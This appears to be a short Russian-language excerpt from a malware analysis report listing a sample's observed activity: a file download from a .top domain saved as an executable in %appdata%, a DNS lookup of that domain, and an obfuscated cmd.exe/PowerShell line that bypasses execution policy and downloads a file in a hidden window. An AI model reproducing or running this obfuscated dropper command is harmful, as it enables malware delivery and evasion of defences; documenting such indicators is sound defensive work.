Техническая информация
- http://vvorootad.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^O^W^ershel^L.Ex^E^ -^ExeCu^tI^oN^p^oLIC^y^ b^YpA^s^S^ -^nO^prOfiLE^ -wiNdowsTylE h^i^DD^E^N^ (nE^W^-OBJE^Ct sy^sTEm.n^E^T.^wEB^CLiEnT).D^o^wnLoAD^fi^Le(^'http://vvoroo...
- DNS ASK vv###otad.top
- '<SYSTEM32>\cmd.exe' /C "P^O^W^ershel^L.Ex^E^ -^ExeCu^tI^oN^p^oLIC^y^ b^YpA^s^S^ -^nO^prOfiLE^ -wiNdowsTylE h^i^DD^E^N^ (nE^W^-OBJE^Ct sy^sTEm.n^E^T.^wEB^CLiEnT).D^o^wnLoAD^fi^Le(^'http://vvoroo...' (со скрытым окном)